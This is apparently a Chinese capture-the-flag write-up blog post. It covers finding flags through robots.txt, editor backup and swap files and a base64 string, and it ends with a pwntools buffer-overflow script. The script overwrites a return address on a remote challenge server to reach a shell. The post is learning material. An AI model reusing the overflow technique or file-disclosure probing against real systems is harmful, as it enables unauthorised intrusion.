霍雅
追求源于热爱,极致源于梦想!
样题果然还是只能是样题,和ciscn一样
水篇文章
访问没啥内容,稍微扫一下
稍微扫一下
访问rebots.txt得到flag1
flag{info_1
访问index.php~得到flag2
s_v3ry_im
访问/.index.php.swp可以下载一个文件,flag3
flag{info_1s_v3ry_imp0rtant_hack}
zmxh是base64的flag头
flag{simple_base}
打开看字符串
有/bin/sh
和input什么
先看input
猜测sub_806CB20就是gets
不确定可以动调
ebp离栈底0x68 ebp是4
ebp是32位长度是4
rbp是64位存档是8
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
#r=process('./filename')#打本地使用
r=remote('8.147.132.32', 18832)
p=b'a'*(0x68+0x4)+p32(0x804890F)
#r.sendlineafter(b'pwn me',p)
r.sendline(p)
r.interactive()